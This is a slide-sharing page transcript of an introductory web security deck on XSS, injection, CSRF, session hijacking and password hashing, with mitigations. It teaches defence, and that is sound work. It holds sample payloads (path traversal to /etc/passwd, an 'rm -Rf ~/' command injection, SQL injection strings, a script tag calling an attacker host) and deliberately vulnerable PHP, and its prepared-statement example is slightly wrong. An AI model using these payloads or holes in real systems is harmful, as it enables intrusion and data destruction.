Download as PDF, PPTX
![© 2015 Adobe Systems Incorporated. All Rights Reserved. 8
Code Injection - Command-Line injection
▪ File paths based on user input is NOT OKAY
$user_id = $_GET['user_id'];
$file = "/some/path/config/$user_id.json";
require $file;
▪ Attackers can access filesystem using "upwards" paths
?user_id=../../../etc/passwd #](https://image.slidesharecdn.com/websecurity101-150410114157-conversion-gate01/85/Web-Security-101-8-320.jpg)
![© 2015 Adobe Systems Incorporated. All Rights Reserved. 9
$user_id = $_GET['user_id'];
$pic = "/some/path/pictures/$user_id.jpg";
if (`ls $pic`) { ... }
Code Injection - Command-Line injection
▪ Avoid user input when executing on the command line
▪ Commands like exec, passthru, and system are often used to execute bash commands
?user_id=./ && rm -Rf ~/](https://image.slidesharecdn.com/websecurity101-150410114157-conversion-gate01/85/Web-Security-101-9-320.jpg)
![© 2015 Adobe Systems Incorporated. All Rights Reserved. 10
$user_id = $_GET['user_id'];
$file = "/some/path/config/$user_id.json";
eval ("file_get_contents('$pic');");
Code Injection - Command-Line injection
▪ Avoid using dynamic code execution
▪ Commands like eval are used to dynamically evaluate PHP code
?user_id=foo');file_get_contents('etc/passwd](https://image.slidesharecdn.com/websecurity101-150410114157-conversion-gate01/85/Web-Security-101-10-320.jpg)
![© 2015 Adobe Systems Incorporated. All Rights Reserved. 13
▪ Similar to code injection, but happens when user input is used as part of a SQL query
$search = $_GET['search'];
$sql = "SELECT * FROM students WHERE name = '$search'";
▪ Can be used to delete, corrupt, or steal data.
?search=';DROP ALL TABLES
?search=';UPDATE students SET name=jerkface
?search=foo' OR public=0
Code Injection - SQL injection](https://image.slidesharecdn.com/websecurity101-150410114157-conversion-gate01/85/Web-Security-101-13-320.jpg)
![© 2015 Adobe Systems Incorporated. All Rights Reserved. 14
▪ SANITIZE YOUR INPUTS
▪ use "bound variables"
$search = $_GET['search'];
$sql = "SELECT * FROM students WHERE name = ?";
$statement = $pdo->prepare($sql, $search);
$statement->execute();
▪ Use ORMs / Database Abstraction Layers when possible
Code Injection - SQL injection](https://image.slidesharecdn.com/websecurity101-150410114157-conversion-gate01/85/Web-Security-101-14-320.jpg)
Uploaded byBrent Shaffer
Web Security 101
The document discusses various web security threats, including cross-site scripting (XSS), code injection, cross-site request forgery (CSRF), and session hijacking, highlighting their mechanisms and how they can be exploited. It emphasizes the importance of proper input validation, user authentication, and secure password management to protect against these vulnerabilities. Additionally, it provides best practices to help mitigate these risks, such as using SSL, sanitizing inputs, and employing secure coding techniques.
More Related Content
![[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...](https://cdn.slidesharecdn.com/ss_thumbnails/cb16hasegawaen-161109050843-thumbnail.jpg?width=640&height=640&fit=bounds)
Web Security 101
- 1. © 2015 AdobeSystems Incorporated. All Rights Reserved. Web Security 101 Brent Shaffer | Matrix Architect
- 2. © 2015 AdobeSystems Incorporated. All Rights Reserved. 2 Why are we talking about this? ▪ Your framework / programming language does not do everything for you ▪ Your website is vulnerable ▪ Security through obscurity is not sufficient ▪ Your friends may want to embarrass you ▪ "hactivists" might make you look like a fool ▪ bots are always busy ▪ Many attacks are easy to prevent ▪ The first step is becoming aware of the types of attacks that exist
- 3. © 2015 AdobeSystems Incorporated. All Rights Reserved. 3 Kinds of Attacks 2 | Code Injection 3 | Cross Site Request Forgery (CSRF) 4 | Session Hijacking 5 | So many, many more... 1 | Cross Site Scripting (XSS)
- 4. © 2015 AdobeSystems Incorporated. All Rights Reserved. 4 Rules of Thumb ▪ All Inputs are Evil! ▪ Do not trust your users ▪ Do not trust your users' cookies, parameters, or HTTP Headers ▪ "All servers are evil" is also a good assumption for end-users ▪ Whitelists are better than blacklists ▪ Never store passwords in plaintext ▪ Never store your passwords in source code ▪ Don't leak error messages
- 5. © 2015 AdobeSystems Incorporated. All Rights Reserved. 5 Cross Site Scripting (XSS) ▪ The term XSS describes a specific kind of injection attack ▪ XSS injects Javascript (or other scripts) that run on the victim's client (browser) ▪ This malicious code usually steals cookies of the person who views the infected web page. ▪ Exploits a user's trust of a site. Can be combined with phishing or CSRF to steal all kinds of things. ▪ Accounted for 84% of all website security vulnerabilities (Symantec, 2007) <script src="http://attacker-site.com/malicious-code.js"> </script>
- 6. © 2015 AdobeSystems Incorporated. All Rights Reserved. ▪ Validate user input when storing ▪ Escape when using variables in output ▪ based off the content type it's being used in ▪ Escaping HTML for a variable in JavaScript will not save you ▪ Use Templating Languages ▪ HAML, Twig (PHP), Jinja (Python), Pebble (Java) ▪ If this isn't possible, use Output Escaping ▪ Use a Markup Language if you want user-input rich text ▪ markdown, textile, rst 6 Cross Site Scripting (XSS)
- 7. © 2015 AdobeSystems Incorporated. All Rights Reserved. 7 Code Injection ▪ Comes in many forms ▪ Command-Line injection ▪ SQL-injection ▪ HTML ▪ JavaScript (XSS)
- 8. © 2015 AdobeSystems Incorporated. All Rights Reserved. 8 Code Injection - Command-Line injection ▪ File paths based on user input is NOT OKAY $user_id = $_GET['user_id']; $file = "/some/path/config/$user_id.json"; require $file; ▪ Attackers can access filesystem using "upwards" paths ?user_id=../../../etc/passwd #
- 9. © 2015 AdobeSystems Incorporated. All Rights Reserved. 9 $user_id = $_GET['user_id']; $pic = "/some/path/pictures/$user_id.jpg"; if (`ls $pic`) { ... } Code Injection - Command-Line injection ▪ Avoid user input when executing on the command line ▪ Commands like exec, passthru, and system are often used to execute bash commands ?user_id=./ && rm -Rf ~/
- 10. © 2015 AdobeSystems Incorporated. All Rights Reserved. 10 $user_id = $_GET['user_id']; $file = "/some/path/config/$user_id.json"; eval ("file_get_contents('$pic');"); Code Injection - Command-Line injection ▪ Avoid using dynamic code execution ▪ Commands like eval are used to dynamically evaluate PHP code ?user_id=foo');file_get_contents('etc/passwd
- 11. © 2015 AdobeSystems Incorporated. All Rights Reserved. 11 ▪ strip “upwards” paths ▪ ensure all files are relative to a safe “root” ▪ be very strict on validation ▪ output-escaping depending on the context ▪ escapeshellcmd for exec ▪ addslashes for eval ▪ use with extreme caution Code Injection - Command-Line injection
- 12. © 2015 AdobeSystems Incorporated. All Rights Reserved. 12 Code Injection - SQL injection © xkcd.com
- 13. © 2015 AdobeSystems Incorporated. All Rights Reserved. 13 ▪ Similar to code injection, but happens when user input is used as part of a SQL query $search = $_GET['search']; $sql = "SELECT * FROM students WHERE name = '$search'"; ▪ Can be used to delete, corrupt, or steal data. ?search=';DROP ALL TABLES ?search=';UPDATE students SET name=jerkface ?search=foo' OR public=0 Code Injection - SQL injection
- 14. © 2015 AdobeSystems Incorporated. All Rights Reserved. 14 ▪ SANITIZE YOUR INPUTS ▪ use "bound variables" $search = $_GET['search']; $sql = "SELECT * FROM students WHERE name = ?"; $statement = $pdo->prepare($sql, $search); $statement->execute(); ▪ Use ORMs / Database Abstraction Layers when possible Code Injection - SQL injection
- 15. © 2015 AdobeSystems Incorporated. All Rights Reserved. 15 Cross-Site Request Forgery (CSRF) ▪ Exploits the browsers running on the client ▪ Exploits a site's trust in its users ▪ Victim is logged into Vulnerable Website ▪ Attacker has Victim make a request to Vulnerable Website without them knowing ▪ Victim submits a form on Fake Website, but it actually posts to Vulnerable Website ▪ Victim clicks a link it believes is for Fake Website, but it actually goes to Vulnerable Website ▪ An action is executed on behalf of Victim that they did not intend https://facebook.com/authorize?client_id=HackerGuy&authorized=true ▪ The Infamous "Samy Worm"
- 16. © 2015 AdobeSystems Incorporated. All Rights Reserved. 16 ▪ Validate the Referrer ▪ The HTTP Referrer header says which URL initiated the request ▪ You can use this to block from any referrer that isn't you ▪ Only works if a whitelist can be constructed for where the requests will come from ▪ Use a CSRF-Token ▪ This is a token generated for each request based on the client's session ID ▪ Each form submits this back to the website ▪ Very difficult for an attacker to spoof <input type="hidden" name="csrf" value="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt"> Cross-Site Request Forgery (CSRF)
- 17. © 2015 AdobeSystems Incorporated. All Rights Reserved. 17 Session Hijacking ▪ Similar to CSRF ▪ The attacker obtains the victim's cookie, and is then able to perform actions on their behalf ▪ Typically done for websites not secured with SSL/HTTPS ▪ Open networks and insecure networks (WEP) commonly found in public areas make it possible to view other traffic on the same router ▪ Plugins make this incredibly easy ▪ FireSheep / Cookie Cadger / DroidSheep ▪ Sniffing is easy with tools like WireShark
- 18. © 2015 AdobeSystems Incorporated. All Rights Reserved. 18 Session Hijacking ▪ Use SSL/HTTPS you dummy! ▪ It is not enough to only secure the page the user logs into ▪ Don't allow HTTP on any site with user logins ▪ As the end user, usually whining and complaining can go a long way ▪ A few months after FireSheep, Facebook and Twitter implemented HTTPS throughout the site
- 19. © 2015 AdobeSystems Incorporated. All Rights Reserved. Proper Password Management 19 ▪ NEVER STORE PASSWORDS IN PLAINTEXT ▪ always use a hash (one-way) ▪ just hashing is not enough ▪ Lookup Tables / Rainbow Tables ▪ all passwords < 7 characters require 64GB space to crack ▪ always use a salt ▪ a random unique string for each password
- 20. © 2015 AdobeSystems Incorporated. All Rights Reserved. 20 Proper Password Management ▪ Brute Forcing ▪ a lot faster than you think ▪ 2012 Macbook Pro for salted MD5s: ▪ 6 char passwords: 5 hours ▪ 7 char passwords: 22 days ▪ entire english language: 1.8 seconds ▪ How to combat ▪ Use slow algorithms ▪ Iterate over hashing functions a lot of times ▪ require 8-character passwords, numbers/symbols, etc.
- 21. © 2015 AdobeSystems Incorporated. All Rights Reserved. 21 Resources ▪ Top 10 Common Attacks: https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet ▪ Automatic SQL Injection & Database Takeover Tool: http://sqlmap.org ▪ Amazon Mistake: http://www.devfactor.net/2014/12/30/2375-amazon-mistake/ ▪ Burger King Hack: http://mashable.com/2013/02/18/burger-king-twitter-account-hacked/ ▪ Twitter Hack: http://countermeasures.trendmicro.eu/twitter-not-hacked-by-iranian-cyber-army/ ▪ Samy's Confession: http://namb.la/popular/tech.html ▪ Bobby Tables: http://bobby-tables.com ▪ Notorious Hacks: http://www.arnnet.com.au/slideshow/341113/top-10-most-notorious-cyber-attacks-history ▪ Passwords: http://www.slideshare.net/ircmaxell/password-storage-and-attacking-in-php-php-argentina ▪ More Good Slides: http://www.slideshare.net/mpeters/web-security-101
- 22. © 2015 AdobeSystems Incorporated. All Rights Reserved. 22 Brent Shaffer bshafs@gmail.com Twitter: @bshaffer Github: @bshaffer Questions?
- 23. © 2015 AdobeSystems Incorporated. All Rights Reserved. Adobe Confidential.